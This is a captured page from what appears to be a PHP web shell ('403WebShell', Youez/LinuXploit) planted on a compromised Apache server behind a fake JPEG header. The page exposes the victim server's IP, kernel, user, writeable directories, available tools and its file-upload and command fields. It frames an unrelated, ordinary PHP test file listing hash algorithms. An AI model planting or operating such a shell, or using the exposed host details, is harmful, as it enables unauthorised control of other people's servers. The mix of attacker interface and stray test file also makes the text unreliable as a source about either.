????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.22.194.224
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/hash/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/hash/tests/hash_algos.phpt
--TEST--
Test hash_algos() function : basic functionality 
--SKIPIF--
<?php extension_loaded('hash') or die('skip: hash extension not loaded.'); ?>
--FILE--
<?php

/* Prototype  : array hash_algos (void)
 * Description: Return a list of registered hashing algorithms
 * Source code: ext/hash/hash.c
 * Alias to functions: 
*/

echo "*** Testing hash_algos() : basic functionality ***\n";
var_dump(hash_algos());

?>
===Done===
--EXPECTF--
*** Testing hash_algos() : basic functionality ***
array(46) {
  [%d]=>
  string(3) "md2"
  [%d]=>
  string(3) "md4"
  [%d]=>
  string(3) "md5"
  [%d]=>
  string(4) "sha1"
  [%d]=>
  string(6) "sha224"
  [%d]=>
  string(6) "sha256"
  [%d]=>
  string(6) "sha384"
  [%d]=>
  string(6) "sha512"
  [%d]=>
  string(9) "ripemd128"
  [%d]=>
  string(9) "ripemd160"
  [%d]=>
  string(9) "ripemd256"
  [%d]=>
  string(9) "ripemd320"
  [%d]=>
  string(9) "whirlpool"
  [%d]=>
  string(10) "tiger128,3"
  [%d]=>
  string(10) "tiger160,3"
  [%d]=>
  string(10) "tiger192,3"
  [%d]=>
  string(10) "tiger128,4"
  [%d]=>
  string(10) "tiger160,4"
  [%d]=>
  string(10) "tiger192,4"
  [%d]=>
  string(6) "snefru"
  [%d]=>
  string(9) "snefru256"
  [%d]=>
  string(4) "gost"
  [%d]=>
  string(11) "gost-crypto"
  [%d]=>
  string(7) "adler32"
  [%d]=>
  string(5) "crc32"
  [%d]=>
  string(6) "crc32b"
  [%d]=>
  string(6) "fnv132"
  [%d]=>
  string(7) "fnv1a32"
  [%d]=>
  string(6) "fnv164"
  [%d]=>
  string(7) "fnv1a64"
  [%d]=>
  string(5) "joaat"
  [%d]=>
  string(10) "haval128,3"
  [%d]=>
  string(10) "haval160,3"
  [%d]=>
  string(10) "haval192,3"
  [%d]=>
  string(10) "haval224,3"
  [%d]=>
  string(10) "haval256,3"
  [%d]=>
  string(10) "haval128,4"
  [%d]=>
  string(10) "haval160,4"
  [%d]=>
  string(10) "haval192,4"
  [%d]=>
  string(10) "haval224,4"
  [%d]=>
  string(10) "haval256,4"
  [%d]=>
  string(10) "haval128,5"
  [%d]=>
  string(10) "haval160,5"
  [%d]=>
  string(10) "haval192,5"
  [%d]=>
  string(10) "haval224,5"
  [%d]=>
  string(10) "haval256,5"
}
===Done===

Youez - 2016 - github.com/yon3zu
LinuXploit